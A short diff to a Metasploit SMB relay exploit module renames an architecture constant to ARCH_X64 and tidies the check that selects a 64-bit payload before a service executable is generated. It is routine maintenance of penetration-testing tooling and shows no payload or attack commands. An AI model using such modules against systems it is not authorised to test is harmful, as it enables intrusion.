@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ],
           [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
         ],
-      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Arch'           => [ARCH_X86, ARCH_X64],
       'Platform'       => 'win',
       'Targets'        =>
         [
@@ -146,7 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
         :servicename => servicename,
         :code => code.encoded
       }
-      if (datastore['PAYLOAD'].include? 'x64')
+      if datastore['PAYLOAD'].include?(ARCH_X64)
         opts.merge!({ :arch => ARCH_X64 })
       end
       exe = generate_payload_exe_service(opts)
